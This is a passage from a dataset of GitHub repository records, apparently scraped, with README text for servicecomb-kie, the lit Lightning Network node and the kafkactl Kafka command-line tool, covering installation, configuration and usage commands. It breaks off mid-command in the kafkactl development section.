then label could be \"farm,role,server,component\" to locate a app's configurations.\nkie fit different senario for configuration management which benifit from label design.\n\n\n## Components\nIt includes 1 components\n\n- server: rest api service to manage kv\n\n## Features\n- kv management: you can manage config item by key and label\n- kv revision mangement: you can mange all kv change history\n- kv change event: use long polling to watch kv changes, highly decreased network cost\n- polling detail track: if any client poll config from server, the detail will be tracked\n## Quick Start\n\n### Run locally with Docker compose\n\n```bash\ngit clone git@github.com:apache/servicecomb-kie.git\ncd servicecomb-kie/deployments/docker\nsudo docker-compose up\n```\nIt will launch 3 components \n- mongodb: 127.0.0.1:27017\n- mongodb UI: http://127.0.0.1:8081\n- servicecomb-kie: http://127.0.0.1:30110\n\n\n## Development\nTo see how to build a local dev environment, check [here](examples/dev)\n\n### Build\nThis will build your own service image and binary in local\n```bash\ncd build\nexport VERSION=0.0.1 #optional, it is latest by default\n./build_docker.sh\n```\n\nThis will generate a \"servicecomb-kie-0.0.1-linux-amd64.tar\" in \"release\" folder,\nand a docker image \"servicecomb/kie:0.0.1\"\n\n# API Doc\nAfter you launch kie server, you can browse API doc in http://127.0.0.1:30110/apidocs.json, \ncopy this doc to http://editor.swagger.io/\n# Documentations\nhttps://kie.readthedocs.io/en/latest/\n\nor follow [here](docs/README.md) to generate it in local\n\n## Clients\n- go https://github.com/go-chassis/kie-client\n\n## Contact\n\nBugs: [issues](https://issues.apache.org/jira/browse/SCB)\n\n## Contributing\n\nSee [Contribution guide](http://servicecomb.apache.org/developers/contributing) for details on submitting patches and the contribution workflow.\n\n## Reporting Issues\n\nSee reporting bugs for details about reporting any issues.\n", "readme_type": "markdown", "hn_comments": "", "gh_updated_time": "", "gh_accessed_time": "", "hn_accessed_time": ""}, {"name": "mit-dci/lit", "link": "https://github.com/mit-dci/lit", "tags": [], "stars": 540, "description": "Lightning Network node software", "lang": "Go", "repo_lang": "", "readme": "# lit - a lightning node you can run on your own\n\n![Lit Logo](litlogo145.png)\n\n[![Build Status](http://hubris.media.mit.edu:8080/job/lit-PR/badge/icon)](http://hubris.media.mit.edu:8080/job/lit/)\n\nUnder development, not for use with real money.\n\n## Setup\n\n### Prerequisites\n\n* [Git](https://git-scm.com/)\n\n* [Go](https://golang.org/doc/install)\n\n* make\n\n* (Optional, Windows) [Cygwin](https://cygwin.com/install.html)\n\n* (Optional, for full test suite) Python 3 + `requests` library from PyPI\n\n### Downloading\n\nClone the repo from git \n\n```bash\ngit clone https://github.com/mit-dci/lit\ncd lit\n```\nor `go get` it\n```go\ngo get -v github.com/mit-dci/lit\n```\n\n### Installation\n\n#### Linux, macOS, Cygwin, etc.\n\nYou can either use Go's built-in dependency management and build tool\n```go\ncd {GOPATH}/src/github.com/mit-dci/lit\ngo get -v ./...\ngo build\n```\nor use the Makefile\n```bash\nmake # or make all\n```\n\nTo run the python integration tests (which requires `bitcoind`), run `make test with-python=false`\n\n#### Windows\n\nInstall [Cygwin](http://www.cygwin.com) and follow the setup instructions or download prebuilt binaries from\n\n1. Make sure that environmental variable `%GOPATH%` is initizlized correctly.\n\n2. 
Download required dependencies and then build with:\n\n```\ngo get -v ./...\ncd %GOPATH%\\src\\github.com\\mit-dci\\lit\ngo build -v .\ngo build -v .\\cmd\\lit-af\n```\n\n### Running lit\n\nThe below command will run Lit on the Bitcoin testnet3 network\n\n(Note: Windows users should take off `./` but need to change `lit` to `lit.exe`)\n\n```bash\n./lit --tn3=true\n```\n\nThe words `yup, yes, y, true, 1, ok, enable, on` can be used to specify that Lit\nautomatically connect to peers fetched from a list of DNS seeds. It can also be replaced by\nthe address of the node you wish to connect to. For example for the btc testnet3:\n\n```bash\n./lit --tn3=localhost\n```\n\nIt will use default port for different nodes. See the \"Command line arguments\" section.\n\n### Packaging\n\nYou can make an archive package for any distribution by doing:\n\n```\n./build/releasebuild.sh \n```\n\nand it will be placed in `build/_releasedir`. It should support any OS that\nGo and lit's dependencies support. In place of `windows` use `win` and\nin place of `386` use `i386`.\n\nYou can also package for Linux, macOS, and Windows in both amd64 and\ni386 architectures by running `make package`. (NOTE: macOS is amd64 only)\n\nRunning `./build/releasebuild.sh clean` cleans the directories it generates.\n\n## Using Lightning\n\nOnce you are done setting up lit, you can read about\n- [the different command line arguments](#command-line-arguments)\n- [the various folders](#folders) or\n- [checkout the Walkthrough](./WALKTHROUGH.md)\n\n## Contributing\n\nPull Requests and Issues are most welcome, checkout [Contributing](./CONTRIBUTING.md) to get started.\n\n## Command line arguments\n\nWhen starting lit, the following command line arguments are available. The\nfollowing commands may also be specified in `lit.conf` which is automatically\ngenerated on startup with `tn3=1` by default.\n\n#### Connecting to networks\n\n| Arguments | Details | Default Port |\n| --------------------------- |--------------------------------------------------------------| ------------- |\n| `--tn3 ` | connect to `nodeHostName`, which is a bitcoin testnet3 node. | 18333 |\n| `--reg ` | connect to `nodeHostName`, which is a bitcoin regtest node. | 18444 |\n| `--lt4 ` | connect to `nodeHostName`, which is a litecoin testnet4 node.| 19335 |\n\n#### Other settings\n\n| Arguments | Details |\n| ---------------------------------|------------------------------------------------------------------------------------------------------------------------------------------------------------------------|\n| `-v` or `--verbose` | Verbose; log everything to stdout as well as the lit.log file. Lots of text. |\n| `--dir ` | Use `folderPath` as the directory. By default, saves to `~/.lit/`. |\n| `-p` or `--rpcport ` | Listen for RPC clients on port `portNumber`. Defaults to `8001`. Useful when you want to run multiple lit nodes on the same computer (also need the `--dir` option). |\n| `-r` or `--reSync` | Try to re-sync to the blockchain. |\n\n## Folders\n\n| Folder Name | Details |\n|:-------------|:-----------------------------------------------------------------------------------------------------------------------------------------|\n| `bech32` | Util for the Bech32 format |\n| `btcutil` | Bitcoin-specific libraries |\n| `build` | Tools used for building Lit |\n| `cmd` | Has some rpc client code to interact with the lit node. 
Not much there yet |\n| `coinparam` | Information and other constants for identifying currencies |\n| `consts` | Global constants |\n| `crypto` | Utility cryptographic libraries |\n| `dlc` | Discreet Log Contracts |\n| `docs` | Writeups for setting up things and screenshots |\n| `elkrem` | A hash-tree for storing `log(n)` items instead of n |\n| `litrpc` | Websockets based RPC connection |\n| `lndc` | Lightning network data connection -- send encrypted / authenticated messages between nodes |\n| `lnutil` | Widely used utility functions |\n| `portxo` | Portable utxo format, exchangable between node and base wallet (or between wallets). Should make this into a BIP once it's more stable. |\n| `powless` | Introduces a web API chainhook in addition to the uspv one |\n| `qln` | A quick channel implementation with databases. Doesn't do multihop yet. |\n| `sig64` | Library to make signatures 64 bytes instead of 71 or 72 or something |\n| `snap` | Snapcraft metadata |\n| `test` | Python Integration tests |\n| `uspv` | Deals with the network layer, sending network messages and filtering what to hand over to `wallit` |\n| `wallit` | Deals with storing and retrieving utxos, creating and signing transactions |\n| `watchtower` | Unlinkable outsourcing of channel monitoring |\n| `wire` | Tools for working with binary data structures in Bitcoin |\n\n### Hierarchy of packages\n\nOne instance of lit has one litNode (package qln).\n\nLitNodes manage lndc connections to other litnodes, manage all channels, rpc listener, and the ln.db. Litnodes then initialize and contol wallits.\n\nA litNode can have multiple wallits; each must have different params. For example, there can be a testnet3 wallit, and a regtest wallit. Eventually it might make sense to support a root key per wallit, but right now the litNode gives a rootPrivkey to each wallet on startup. Wallits each have a db file which tracks utxos, addresses, and outpoints to watch for the upper litNode. Wallits do not directly do any network communication. Instead, wallits have one or more chainhooks; a chainhook is an interface that talks to the blockchain.\n\nOne package that implements the chainhook interface is uspv. Uspv deals with headers, wire messages to fullnodes, filters, and all the other mess that is contemporary SPV.\n\n(in theory it shouldn't be too hard to write a package that implements the chainhook interface and talks to some block explorer. Maybe if you ran your own explorer and authed and stuff that'd be OK.)\n\n#### Dependency graph\n\n![Dependency Graph](docs/deps.png)\n\n## License\n\n[MIT](https://github.com/mit-dci/lit/blob/master/LICENSE)\n", "readme_type": "markdown", "hn_comments": "", "gh_updated_time": "", "gh_accessed_time": "", "hn_accessed_time": ""}, {"name": "deviceinsight/kafkactl", "link": "https://github.com/deviceinsight/kafkactl", "tags": ["apache-kafka", "avro", "cli", "kafka", "golang", "zsh", "fish"], "stars": 539, "description": "Command Line Tool for managing Apache Kafka", "lang": "Go", "repo_lang": "", "readme": "\n# kafkactl\n\nA command-line interface for interaction with Apache Kafka\n\n[![Build Status](https://github.com/deviceinsight/kafkactl/workflows/Lint%20%2F%20Test%20%2F%20IT/badge.svg?branch=main)](https://github.com/deviceinsight/kafkactl/actions)\n| [![command docs](https://img.shields.io/badge/command-docs-blue.svg)](https://deviceinsight.github.io/kafkactl/) \n\n## Features\n\n- command auto-completion for bash, zsh, fish shell including dynamic completion for e.g. 
topics or consumer groups.\n- support for avro schemas\n- Configuration of different contexts\n- directly access kafka clusters inside your kubernetes cluster\n- support for consuming and producing protobuf-encoded messages\n\n[![asciicast](https://asciinema.org/a/vmxrTA0h8CAXPnJnSFk5uHKzr.svg)](https://asciinema.org/a/vmxrTA0h8CAXPnJnSFk5uHKzr)\n\n## Installation\n\nYou can install the pre-compiled binary or compile from source.\n\n### Install the pre-compiled binary\n\n**snap**:\n\n```bash\nsnap install kafkactl\n```\n\n**homebrew**:\n```bash\n# install tap repostory once\nbrew tap deviceinsight/packages\n# install kafkactl\nbrew install deviceinsight/packages/kafkactl\n# upgrade kafkactl\nbrew upgrade deviceinsight/packages/kafkactl\n```\n\n**deb/rpm**:\n\nDownload the .deb or .rpm from the [releases page](https://github.com/deviceinsight/kafkactl/releases) and install with dpkg -i and rpm -i respectively.\n\n**yay (AUR)**\n\nThere's a kafkactl [AUR package](https://aur.archlinux.org/packages/kafkactl/) available for Arch. Install it with your AUR helper of choice (e.g. [yay](https://github.com/Jguer/yay)):\n\n```bash\nyay -S kafkactl\n```\n\n**manually**:\n\nDownload the pre-compiled binaries from the [releases page](https://github.com/deviceinsight/kafkactl/releases) and copy to the desired location.\n\n### Compiling from source\n\n```bash\ngo get -u github.com/deviceinsight/kafkactl\n```\n\n**NOTE:** make sure that `kafkactl` is on PATH otherwise auto-completion won't work.\n\n## Configuration\n\nIf no config file is found, a default config is generated in `$HOME/.config/kafkactl/config.yml`.\nThis configuration is suitable to get started with a single node cluster on a local machine. \n\n### Create a config file\n\nCreate `$HOME/.config/kafkactl/config.yml` with a definition of contexts that should be available\n\n```yaml\ncontexts:\n default:\n brokers:\n - localhost:9092\n remote-cluster:\n brokers:\n - remote-cluster001:9092\n - remote-cluster002:9092\n - remote-cluster003:9092\n\n # optional: tls config\n tls:\n enabled: true\n ca: my-ca\n cert: my-cert\n certKey: my-key\n # set insecure to true to ignore all tls verification (defaults to false)\n insecure: false\n\n # optional: sasl support\n sasl:\n enabled: true\n username: admin\n password: admin\n # optional configure sasl mechanism as plaintext, scram-sha256, scram-sha512 (defaults to plaintext)\n mechanism: scram-sha512\n \n # optional: access clusters running kubernetes\n kubernetes:\n enabled: false\n binary: kubectl #optional\n kubeConfig: ~/.kube/config #optional\n kubeContext: my-cluster\n namespace: my-namespace\n # optional: docker image to use (tag will be added by kafkactl based on the current version) \n image: private.registry.com/deviceinsight/kafkactl\n # optional: secret for private docker registry\n imagePullSecret: registry-secret\n\n # optional: clientID config (defaults to kafkactl-{username})\n clientID: my-client-id\n \n # optional: kafkaVersion (defaults to 2.5.0)\n kafkaVersion: 1.1.1\n\n # optional: timeout for admin requests (defaults to 3s)\n requestTimeout: 10s\n\n # optional: avro schema registry\n avro:\n schemaRegistry: localhost:8081\n # optional: configure codec for (de)serialization as standard,avro (defaults to standard)\n # see: https://github.com/deviceinsight/kafkactl/issues/123\n jsonCodec: avro\n \n # optional: default protobuf messages search paths\n protobuf:\n importPaths:\n - \"/usr/include/protobuf\"\n protoFiles:\n - \"someMessage.proto\"\n - \"otherMessage.proto\"\n 
protosetFiles:\n - \"/usr/include/protoset/other.protoset\"\n \n producer:\n # optional: changes the default partitioner\n partitioner: \"hash\"\n\n # optional: changes default required acks in produce request\n # see: https://pkg.go.dev/github.com/Shopify/sarama?utm_source=godoc#RequiredAcks\n requiredAcks: \"WaitForAll\"\n\n # optional: maximum permitted size of a message (defaults to 1000000)\n maxMessageBytes: 1000000\n\ncurrent-context: default\n```\n\nThe config file location is resolved by\n * checking for a provided commandline argument: `--config-file=$PATH_TO_CONFIG`\n * or by evaluating the environment variable: `export KAFKA_CTL_CONFIG=$PATH_TO_CONFIG`\n * or as default the config file is looked up from one of the following locations:\n * `$HOME/.config/kafkactl/config.yml`\n * `$HOME/.kafkactl/config.yml`\n * `$SNAP_REAL_HOME/.kafkactl/config.yml`\n * `$SNAP_DATA/kafkactl/config.yml`\n * `/etc/kafkactl/config.yml`\n\n### Auto completion\n\n#### bash\n\n**NOTE:** if you installed via snap, bash completion should work automatically.\n\n```\nsource <(kafkactl completion bash)\n```\n\nTo load completions for each session, execute once:\nLinux:\n```\nkafkactl completion bash > /etc/bash_completion.d/kafkactl\n```\n \nMacOS:\n```\nkafkactl completion bash > /usr/local/etc/bash_completion.d/kafkactl\n```\n\n#### zsh\n\nIf shell completion is not already enabled in your environment,\nyou will need to enable it. You can execute the following once:\n\n```\necho \"autoload -U compinit; compinit\" >> ~/.zshrc\n```\n\nTo load completions for each session, execute once:\n\n```\nkafkactl completion zsh > \"${fpath[1]}/_kafkactl\"\n```\n\nYou will need to start a new shell for this setup to take effect.\n\n#### Fish\n\n```\nkafkactl completion fish | source\n```\n\nTo load completions for each session, execute once:\n```\nkafkactl completion fish > ~/.config/fish/completions/kafkactl.fish\n```\n\n## Running in docker\n\nAssuming your Kafka brokers are accessible under `kafka1:9092` and `kafka2:9092`, you can list topics by running: \n\n```bash\ndocker run --env BROKERS=\"kafka1:9092 kafka2:9092\" deviceinsight/kafkactl:latest get topics\n```\n\nIf a more elaborate config is needed, you can mount it as a volume:\n\n```bash\ndocker run -v /absolute/path/to/config.yml:/etc/kafkactl/config.yml deviceinsight/kafkactl get topics\n``` \n\n## Configuration via environment variables\n\nEvery key in the `config.yml` can be overwritten via environment variables. The corresponding environment variable\nfor a key can be found by applying the following rules:\n\n1. replace `.` by `_`\n1. replace `-` by `_`\n1. write the key name in ALL CAPS\n\ne.g. the key `contexts.default.tls.certKey` has the corresponding environment variable `CONTEXTS_DEFAULT_TLS_CERTKEY`.\n\n**NOTE:** an array variable can be written using whitespace as delimiter. 
For example `BROKERS` can be provided as\n`BROKERS=\"broker1:9092 broker2:9092 broker3:9092\"`.\n\nIf environment variables for the `default` context should be set, the prefix `CONTEXTS_DEFAULT_` can be omitted.\nSo, instead of `CONTEXTS_DEFAULT_TLS_CERTKEY` one can also set `TLS_CERTKEY`.\nSee **root_test.go** for more examples.\n\n## Running in Kubernetes\n\n> :construction: This feature is still experimental.\n\nIf your kafka cluster is not directly accessible from your machine, but it is accessible from a kubernetes cluster\nwhich in turn is accessible via `kubectl` from your machine you can configure kubernetes support:\n\n```$yaml\ncontexts:\n kafka-cluster:\n brokers:\n - broker1:9092\n - broker2:9092\n kubernetes:\n enabled: true\n binary: kubectl #optional\n kubeContext: k8s-cluster\n namespace: k8s-namespace\n```\n\nInstead of directly talking to kafka brokers a kafkactl docker image is deployed as a pod into the kubernetes\ncluster, and the defined namespace. Standard-Input and Standard-Output are then wired between the pod and your shell\nrunning kafkactl. \n\nThere are two options:\n1. You can run `kafkactl attach` with your kubernetes cluster configured. This will use `kubectl run` to create a pod\nin the configured kubeContext/namespace which runs an image of kafkactl and gives you a `bash` into the container.\nStandard-in is piped to the pod and standard-out, standard-err directly to your shell. You even get auto-completion.\n\n2. You can run any other kafkactl command with your kubernetes cluster configured. Instead of directly\nquerying the cluster a pod is deployed, and input/output are wired between pod and your shell.\n\nThe names of the brokers have to match the service names used to access kafka in your cluster. A command like this should\n give you this information:\n```bash\nkubectl get svc | grep kafka\n```\n\n> :bulb: The first option takes a bit longer to start up since an Ubuntu based docker image is used in order to have\na bash available. The second option uses a docker image build from scratch and should therefore be quicker.\nWhich option is more suitable, will depend on your use-case. \n\n> :warning: currently _kafkactl_ must **NOT** be installed via _snap_ in order for the kubernetes feature to work. The snap runs in a sandbox and is therefore unable to access the `kubectl` binary. 
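\n\nFor example (a minimal sketch assuming the kubernetes context above is the current context; both commands appear elsewhere in this README):\n\n```bash\n# option 1: interactive shell in a kafkactl pod inside the cluster\nkafkactl attach\n\n# option 2: run a single kafkactl command through an in-cluster pod\nkafkactl get topics\n```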
\n\n## Command documentation\n\nThe documentation for all available commands can be found here:\n\n[![command docs](https://img.shields.io/badge/command-docs-blue.svg)](https://deviceinsight.github.io/kafkactl/)\n\n\n## Examples\n\n### Consuming messages\n\nConsuming messages from a topic can be done with:\n```bash\nkafkactl consume my-topic\n```\n\nIn order to consume starting from the oldest offset use:\n```bash\nkafkactl consume my-topic --from-beginning\n```\n\nThe following example prints message `key` and `timestamp` as well as `partition` and `offset` in `yaml` format:\n```bash\nkafkactl consume my-topic --print-keys --print-timestamps -o yaml\n```\n\nTo print partition in default output format use:\n```bash\nkafkactl consume my-topic --print-partitions\n```\n\nHeaders of kafka messages can be printed with the parameter `--print-headers` e.g.:\n```bash\nkafkactl consume my-topic --print-headers -o yaml\n```\n\nIf one is only interested in the last `n` messages this can be achieved by `--tail` e.g.:\n```bash\nkafkactl consume my-topic --tail=5\n```\n\nThe consumer can be stopped when the latest offset is reached using `--exit` parameter e.g.:\n```bash\nkafkactl consume my-topic --from-beginning --exit\n```\n\nThe following example prints keys in hex and values in base64:\n```bash\nkafkactl consume my-topic --print-keys --key-encoding=hex --value-encoding=base64\n```\n\nThe consumer can convert protobuf messages to JSON in keys (optional) and values:\n```bash\nkafkactl consume my-topic --value-proto-type MyTopicValue --key-proto-type MyTopicKey --proto-file kafkamsg.proto\n```\n\nTo join a consumer group and consume messages as a member of the group:\n```bash\nkafkactl consume my-topic --group my-consumer-group\n```\n\nIf you want to limit the number of messages that will be read, specify `--max-messages`:\n```bash\nkafkactl consume my-topic --max-messages 2\n```\n\n### Producing messages\n\nProducing messages can be done in multiple ways. If we want to produce a message with `key='my-key'`,\n`value='my-value'` to the topic `my-topic` this can be achieved with one of the following commands:\n\n```bash\necho \"my-key#my-value\" | kafkactl produce my-topic --separator=#\necho \"my-value\" | kafkactl produce my-topic --key=my-key\nkafkactl produce my-topic --key=my-key --value=my-value\n```\n\nIf we have a file containing messages where each line contains `key` and `value` separated by `#`, the file can be\nused as input to produce messages to topic `my-topic`:\n\n```bash\ncat myfile | kafkactl produce my-topic --separator=#\n```\n\nThe same can be accomplished without piping the file to stdin with the `--file` parameter:\n```bash\nkafkactl produce my-topic --separator=# --file=myfile\n```\n\nIf the messages in the input file need to be split by a different delimiter than `\\n` a custom line separator can be provided:\n ```bash\n kafkactl produce my-topic --separator=# --lineSeparator=|| --file=myfile\n ```\n\n**NOTE:** if the file was generated with `kafkactl consume --print-keys --print-timestamps my-topic` the produce\ncommand is able to detect the message timestamp in the input and will ignore it. \n\nthe number of messages produced per second can be controlled with the `--rate` parameter:\n\n```bash\ncat myfile | kafkactl produce my-topic --separator=# --rate=200\n```\n\nIt is also possible to specify the partition to insert the message:\n```bash\nkafkactl produce my-topic --key=my-key --value=my-value --partition=2\n```\n\nAdditionally, a different partitioning scheme can be used. 
When a `key` is provided the default partitioner\nuses the `hash` of the `key` to assign a partition. So the same `key` will end up in the same partition: \n```bash\n# the following 3 messages will all be inserted into the same partition\nkafkactl produce my-topic --key=my-key --value=my-value\nkafkactl produce my-topic --key=my-key --value=my-value\nkafkactl produce my-topic --key=my-key --value=my-value\n\n# the following 3 messages will probably be inserted into different partitions\nkafkactl produce my-topic --key=my-key --value=my-value --partitioner=random\nkafkactl produce my-topic --key=my-key --value=my-value --partitioner=random\nkafkactl produce my-topic --key=my-key --value=my-value --partitioner=random\n```\n\nMessage headers can also be written:\n```bash\nkafkactl produce my-topic --key=my-key --value=my-value --header key1:value1 --header key2:value\\:2\n```\n\nThe following example writes the key from base64 and value from hex:\n```bash\nkafkactl produce my-topic --key=dGVzdC1rZXk= --key-encoding=base64 --value=0000000000000000 --value-encoding=hex\n```\n\nYou can control how many replica acknowledgements are needed for a response:\n```bash\nkafkactl produce my-topic --key=my-key --value=my-value --required-acks=WaitForAll\n```\n\nProducing null values (tombstone records) is also possible: \n```bash\n kafkactl produce my-topic --null-value\n ```\n\nProducing a protobuf message converted from JSON:\n```bash\nkafkactl produce my-topic --key='{\"keyField\":123}' --key-proto-type MyKeyMessage --value='{\"valueField\":\"value\"}' --value-proto-type MyValueMessage --proto-file kafkamsg.proto\n```\n\n### Avro support\n\nIn order to enable avro support, you just have to add the schema registry to your configuration:\n```yaml\ncontexts:\n  localhost:\n    avro:\n      schemaRegistry: localhost:8081\n```\n\n#### Producing to an avro topic\n\n`kafkactl` will look up the topic in the schema registry in order to determine if key or value needs to be avro encoded.\nIf producing with the latest `schemaVersion` is sufficient, no additional configuration is needed and `kafkactl` handles\nthis automatically.\n\nIf, however, one needs to produce an older `schemaVersion`, this can be achieved by providing the parameters `keySchemaVersion`, `valueSchemaVersion`.\n\n##### Example\n\n```bash\n# create a topic\nkafkactl create topic avro_topic\n# add a schema for the topic value\ncurl -X POST -H \"Content-Type: application/vnd.schemaregistry.v1+json\" \\\n--data '{\"schema\": \"{\\\"type\\\": \\\"record\\\", \\\"name\\\": \\\"LongList\\\", \\\"fields\\\" : [{\\\"name\\\": \\\"next\\\", \\\"type\\\": [\\\"null\\\", \\\"LongList\\\"], \\\"default\\\": null}]}\"}' \\\nhttp://localhost:8081/subjects/avro_topic-value/versions\n# produce a message\nkafkactl produce avro_topic --value {\\\"next\\\":{\\\"LongList\\\":{}}}\n# consume the message\nkafkactl consume avro_topic --from-beginning --print-schema -o yaml\n```\n\n#### Consuming from an avro topic\n\nAs for producing, `kafkactl` will also look up the topic in the schema registry to determine if key or value needs to be\ndecoded with an avro schema.\n\nThe `consume` command handles this automatically and no configuration is needed.\n\nThe additional parameter `--print-schema` can be provided to display the schema used for decoding.\n\n### Protobuf support\n\n`kafkactl` can consume and produce protobuf-encoded messages. 
In order to enable protobuf serialization/deserialization\nyou should add the flag `--value-proto-type` and optionally `--key-proto-type` (if keys are encoded in protobuf format)\nwith the type name. Protobuf-encoded messages are mapped with [pbjson](https://developers.google.com/protocol-buffers/docs/proto3#json).\n\n`kafkactl` will search for message types in the following order:\n1. Protoset files specified with the `--protoset-file` flag\n2. Protoset files specified in the `context.protobuf.protosetFiles` config value\n3. Proto files specified with the `--proto-file` flag\n4. Proto files specified in the `context.protobuf.protoFiles` config value\n\nProto files may require some dependencies in `import` sections. To specify additional lookup paths use the\n`--proto-import-path` flag or the `context.protobuf.importPaths` config value.\n\nIf the provided message types are not found, `kafkactl` will return an error.\n\nNote that if you want to use raw proto files, `protoc` does not need to be installed.\n\nAlso note that protoset files must be compiled with included imports:\n```bash\nprotoc -o kafkamsg.protoset --include_imports kafkamsg.proto\n```\n\n#### Example\nAssume you have the following proto schema in `kafkamsg.proto`:\n```protobuf\nsyntax = \"proto3\";\n\nimport \"google/protobuf/timestamp.proto\";\n\nmessage TopicMessage {\n google.protobuf.Timestamp produced_at = 1;\n int64 num = 2;\n}\n\nmessage TopicKey {\n float fvalue = 1;\n}\n```\nThe \"well-known\" `google/protobuf` types are included, so no additional proto files are needed.\n\nTo produce a message run\n```bash\nkafkactl produce --key '{\"fvalue\":1.2}' --key-proto-type TopicKey --value '{\"producedAt\":\"2021-12-01T14:10:12Z\",\"num\":\"1\"}' --value-proto-type TopicMessage --proto-file kafkamsg.proto\n```\nor with a protoset\n```bash\nkafkactl produce --key '{\"fvalue\":1.2}' --key-proto-type TopicKey --value '{\"producedAt\":\"2021-12-01T14:10:12Z\",\"num\":\"1\"}' --value-proto-type TopicMessage --protoset-file kafkamsg.protoset\n```\n\nTo consume messages run\n```bash\nkafkactl consume --key-proto-type TopicKey --value-proto-type TopicMessage --proto-file kafkamsg.proto\n```\nor with a protoset\n```bash\nkafkactl consume --key-proto-type TopicKey --value-proto-type TopicMessage --protoset-file kafkamsg.protoset\n```\n\n### Altering topics\n\nUsing the `alter topic` command allows you to change the partition count, replication factor and topic-level\nconfigurations of an existing topic.\n\nThe partition count can be increased with:\n```bash\nkafkactl alter topic my-topic --partitions 32\n```\n\nThe replication factor can be altered with:\n```bash\nkafkactl alter topic my-topic --replication-factor 2\n```\n\n> :information_source: when altering the replication factor, kafkactl tries to keep the number of replicas assigned to each\n> broker balanced. 
If you need more control over the assigned replicas use `alter partition` directly.\n\nThe topic configs can be edited by supplying key value pairs as follows:\n```bash\nkafkactl alter topic my-topic --config retention.ms=3600000 --config cleanup.policy=compact\n```\n\n> :bulb: use the flag `--validate-only` to perform a dry-run without actually modifying the topic \n\n### Altering partitions\n\nThe assigned replicas of a partition can directly be altered with:\n```bash\n# set brokers 102,103 as replicas for partition 3 of topic my-topic\nkafkactl alter partition my-topic 3 -r 102,103\n```\n\n### Clone topic\n\nA new topic may be created from an existing topic as follows:\n```bash\nkafkactl clone topic source-topic target-topic\n```\n\nThe source topic must exist; the target topic must not exist.\n`kafkactl` clones the partition count, replication factor and config entries.\n\n### Consumer groups\n\nIn order to get a list of consumer groups, the `get consumer-groups` command can be used:\n```bash\n# all available consumer groups\nkafkactl get consumer-groups \n# only consumer groups for a single topic\nkafkactl get consumer-groups --topic my-topic\n# using command alias\nkafkactl get cg\n```\n\nTo get detailed information about the consumer group use `describe consumer-group`. If the parameter `--partitions`\nis provided, details will be printed for each partition; otherwise the partitions are aggregated per client.\n\n```bash\n# describe a consumer group\nkafkactl describe consumer-group my-group \n# show partition details only for partitions with lag\nkafkactl describe consumer-group my-group --only-with-lag\n# show details only for a single topic\nkafkactl describe consumer-group my-group --topic my-topic\n# using command alias\nkafkactl describe cg my-group\n```\n\n### Create consumer groups\n\nA consumer-group can be created as follows:\n\n```bash\n# create group with offset for all partitions set to oldest\nkafkactl create consumer-group my-group --topic my-topic --oldest\n# create group with offset for all partitions set to newest\nkafkactl create consumer-group my-group --topic my-topic --newest\n# create group with offset for a single partition set to specific offset\nkafkactl create consumer-group my-group --topic my-topic --partition 5 --offset 100\n# create group for multiple topics with offset for all partitions set to oldest\nkafkactl create consumer-group my-group --topic my-topic-a --topic my-topic-b --oldest\n```\n\n### Clone consumer group\n\nA consumer group may be created as a clone of another consumer group as follows:\n```bash\nkafkactl clone consumer-group source-group target-group\n```\n\nThe source group must exist and have committed offsets. The target group must either not exist or have no committed offsets.\n`kafkactl` clones the topic assignment and partition offsets.\n\n### Reset consumer group offsets\n\nTo make sure the reset does what is expected, by default only\nthe resulting offsets are printed without actually executing the reset. Use the additional parameter `--execute` to perform the reset. 
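\n\nFor example, a safe two-step workflow is to review the dry-run output first and only then apply it (a minimal sketch reusing the flags shown in this section; `my-group` and `my-topic` are placeholders):\n```bash\n# dry run: only print the target offsets, nothing is changed\nkafkactl reset offset my-group --topic my-topic --oldest\n# apply the reset\nkafkactl reset offset my-group --topic my-topic --oldest --execute\n```\n\nFurther examples: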
\n\n```bash\n# reset offset for all partitions to the oldest offset\nkafkactl reset offset my-group --topic my-topic --oldest\n# reset offset for all partitions to the newest offset\nkafkactl reset offset my-group --topic my-topic --newest\n# reset offset for a single partition to a specific offset\nkafkactl reset offset my-group --topic my-topic --partition 5 --offset 100\n# reset offset to newest for all topics in the group\nkafkactl reset offset my-group --all-topics --newest\n# reset offset for all partitions on multiple topics to the oldest offset\nkafkactl reset offset my-group --topic my-topic-a --topic my-topic-b --oldest\n```\n\n### Delete consumer group offsets\n\nIn order to delete a consumer group offset use `delete offset`:\n\n```bash\n# delete offset for all partitions of topic my-topic\nkafkactl delete offset my-group --topic my-topic\n# delete offset for partition 1 of topic my-topic\nkafkactl delete offset my-group --topic my-topic --partition 1\n```\n\n### Delete consumer groups\n\nIn order to delete a consumer group or a list of consumer groups use `delete consumer-group`:\n\n```bash\n# delete consumer group my-group\nkafkactl delete consumer-group my-group\n```\n\n### ACL Management\n\nAvailable ACL operations are documented [here](https://docs.confluent.io/platform/current/kafka/authorization.html#operations).\n\n#### Create a new ACL\n\n```bash\n# create an acl that allows topic read for a user 'consumer'\nkafkactl create acl --topic my-topic --operation read --principal User:consumer --allow\n# create an acl that denies topic write for a user 'consumer' coming from a specific host\nkafkactl create acl --topic my-topic --operation write --host 1.2.3.4 --principal User:consumer --deny\n# allow multiple operations\nkafkactl create acl --topic my-topic --operation read --operation describe --principal User:consumer --allow\n# allow read on all topics with a common prefix\nkafkactl create acl --topic my-prefix --pattern prefixed --operation read --principal User:consumer --allow\n```\n\n#### List ACLs\n\n```bash\n# list all acls\nkafkactl get acl\n# list all acls (alias command)\nkafkactl get access-control-list\n# filter only topic resources\nkafkactl get acl --topics\n# filter only consumer group resources with operation read\nkafkactl get acl --groups --operation read\n```\n\n#### Delete ACLs\n\n```bash\n# delete all topic read acls\nkafkactl delete acl --topics --operation read --pattern any\n# delete all topic acls for any operation\nkafkactl delete acl --topics --operation any --pattern any\n# delete all cluster acls for any operation\nkafkactl delete acl --cluster --operation any --pattern any\n# delete all consumer-group acls with operation describe, patternType prefixed and permissionType allow\nkafkactl delete acl --groups --operation describe --pattern prefixed --allow\n```\n\n### Getting Brokers\n\nTo get the list of brokers of a kafka cluster use `get brokers`:\n\n```bash\n# get the list of brokers\nkafkactl get brokers\n```\n\n### Describe Broker\n\nTo view the configs for a single broker use `describe broker`:\n\n```bash\n# describe broker\nkafkactl describe broker 1\n```\n\n## Development\n\nIn order to see linter errors before commit, add the following pre-commit hook:\n\n```bash\npip install --user pre-commit\npre-commit install\n```\n\n### Pull requests\n\n```shell\n# checkout locally\nPULL_REQUEST_ID=123\nLOCAL_BRANCH_NAME=feature/abc\ngit fetch origin pull/${PULL_REQUEST_ID}/head:${LOCAL_BRANCH_NAME}\ngit checkout ${LOCAL_BRANCH_NAME}\n\n# push to 
